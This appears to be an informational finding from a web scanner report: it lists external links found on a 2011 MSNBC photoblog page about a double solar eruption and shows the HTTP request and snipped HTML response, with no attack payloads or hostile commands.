http://hal90004.newsvine.com/
http://halowain.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ilovecanoes.newsvine.com/
http://isthishumanity.newsvine.com/
http://iwonder2997692.newsvine.com/
http://jayphly1300264.newsvine.com/
http://john-roach.newsvine.com/
http://josh1791701.newsvine.com/
http://jpfs52.newsvine.com/
http://jwp6868.newsvine.com/
http://larbell.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/photoblog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=901585916&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::
http://mar2892158.newsvine.com/
http://markscastle.newsvine.com/
http://martyofredbay.newsvine.com/
http://mc2075922.newsvine.com/
http://mdb123.newsvine.com/
http://mikeobama2313287.newsvine.com/
http://mikeymike.newsvine.com/
http://mklavano.newsvine.com/
http://mnstrm2.newsvine.com/
http://mossdog420m.newsvine.com/
http://mpp2029706.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nerakluvs.newsvine.com/
http://nightly.msnbc.com/
http://oscarpwalnuts.newsvine.com/
http://pandori.newsvine.com/
http://patrick111.newsvine.com/
http://paulhardy.newsvine.com/
http://phantombeast.newsvine.com/
http://phillyc1.newsvine.com/
http://phloeman.newsvine.com/
http://phoehammer.newsvine.com/
http://platform.twitter.com/widgets.js
http://polanofp.newsvine.com/
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://raysmith.newsvine.com/
http://redtape.msnbc.com/
http://revitray.newsvine.com/
http://revlucifer.newsvine.com/
http://robw1001.newsvine.com/
http://roy-1813861.newsvine.com/
http://rwh0829.newsvine.com/
http://sbphrog.newsvine.com/
http://scott-mckinsey.newsvine.com/
http://sdo.gsfc.nasa.gov/
http://senigallia.newsvine.com/
http://snrekkcaj.newsvine.com/
http://sonflower.newsvine.com/
http://spaceweather.com/
http://spiddas.newsvine.com/
http://steveorevo.newsvine.com/
http://takestwo.newsvine.com/
http://tamuk.newsvine.com/
http://thekhankubla.newsvine.com/
http://today.msnbc.com/
http://tony2997870.newsvine.com/
http://tracer58.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/b0yle
http://twitter.com/share
http://twyla-moon.newsvine.com/
http://unregistereduser.newsvine.com/
http://uradouch.newsvine.com/
http://votelover.newsvine.com/
http://whyajones.newsvine.com/
http://wire-bender.newsvine.com/
http://wvbuild.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.byjohnroach.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/cosmiclog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://www.hotmail.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

GET /_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=270
Date: Sun, 30 Jan 2011 02:17:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 186064

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=901585916&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<div class="normal"><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="normal"><a href="http://fdpfg.newsvine.com/">fdpfg</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://mossdog420m.newsvine.com/">Megalodon-358694</a>
...[SNIP]...
<p><a href="http://attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
